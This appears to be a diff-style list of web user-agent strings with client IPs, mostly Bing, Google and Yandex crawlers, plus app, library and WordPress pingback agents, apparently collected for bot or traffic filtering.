    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.182]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.66]
    +okhttp/3.11.0 [ip:151.46.206.213]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.200]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.44]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.46]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.133]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.28]
    +okhttp/3.11.0 [ip:37.163.26.181]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.163]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.59]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.19]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.163]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.216]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.36]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.35]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.146]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.71]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.13]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.9]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.153]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.2]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.78]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.45]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.230]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.134]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.123]
    +Go-http-client/1.1 [ip:213.32.4.211]
    +okhttp/3.11.0 [ip:5.90.129.251]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.249]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.17]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.65]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.186]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.62]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.96]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.133]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.97]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.157]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.87]
    +AvsDeviceSdk/1.14.0
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.109]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.215]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.129]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.211]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.137]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.122]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.209]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.13]
    +okhttp/3.11.0 [ip:151.46.180.71]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.149]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:66.249.89.92]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.100]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.56]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.96]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.3]
    +okhttp/3.11.0 [ip:37.159.48.26]
    +python-requests/2.21.0 [ip:213.32.4.247]
    +WordPress/3.3.1; http://www.1.zt.ua/vybory2012
    +WordPress/4.9.16; http://spaghetticontest.ir
    +WordPress/5.5.3; https://political.lk
    +WordPress/5.0.3; http://www.qc187.com
    +WordPress/4.9.16; http://www.studioannalisaspada.it
    +WordPress/4.8.12; http://noic.devpreview.net
    +WordPress/5.3.2; http://hitec.tn
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605278751-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605278754-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605229747-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605245975-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605274507-0
    +WhatsApp/2.20.206.10 A
    +WhatsApp/2.20.205.16 A
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 PTST/201112.191139
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1605247018-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 7.0; SM-J330G ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 7.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605300621-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605300648-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Mobile Safari/537.36 PTST/201112.191139
    +WordPress/5.3.6; https://lapki-tapki.ru
    +WhatsApp/2.20.205.8 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605275917-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 9; SM-J415F ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605275914-0
    +okhttp/3.12.5 [ip:5.168.208.225]
    +okhttp/3.11.0 [ip:37.160.52.176]
    +okhttp/3.12.5 [ip:5.77.75.148]
    +okhttp/3.12.1 [ip:213.32.4.247]
    +okhttp/3.12.5 [ip:201.29.170.228]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.79.68]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.191]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.66]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.255.253.150]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.255.231.66]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.121]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.43]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.221]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.239]
    +Java/1.8.0_242 [ip:213.32.4.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.145]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.54]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.54]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.239]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.68]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.153]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.27]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.235]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.81]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.144]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.213]
    +okhttp/3.11.0 [ip:37.160.53.8]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.61]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.144]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.169]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.40]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.105]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.206]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.199]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.56]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.248]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.176]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.6]
    +okhttp/3.12.5 [ip:5.179.129.122]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.4]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.174]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.206]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.141]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.83]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.221]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.128]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.120]
    +curl Mozilla/5.0
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.47]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.73]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.178]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.47]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.101]
    +Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php) [ip:54.197.222.220]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.80]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.163]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.173]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.68.49]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.148]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.47]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.170]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.90]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.164]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.184]
    +okhttp/3.12.5 [ip:181.46.164.132]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.20]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.47]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.41]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.156]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.64]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.12]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.162]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.248]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.66]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.26]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.180]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.101]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.18]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.252]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.5]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.114]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.184]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.24]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.45]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.49]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.147]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.29]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.175]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.108]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.17]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.197]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.104]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.70]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.142]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.115]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.140]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.69]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.205]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.38]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.221]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.211]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.159]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.62]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.229]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.160]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.184]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.165]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.168]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.103]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.99]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.113]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.60]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.241]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.182]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.96]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.25]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.253]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.136]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.150]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.12]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.157]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.149]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.162]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.195]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.170]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.155]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.166]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.208]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.65]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.72]
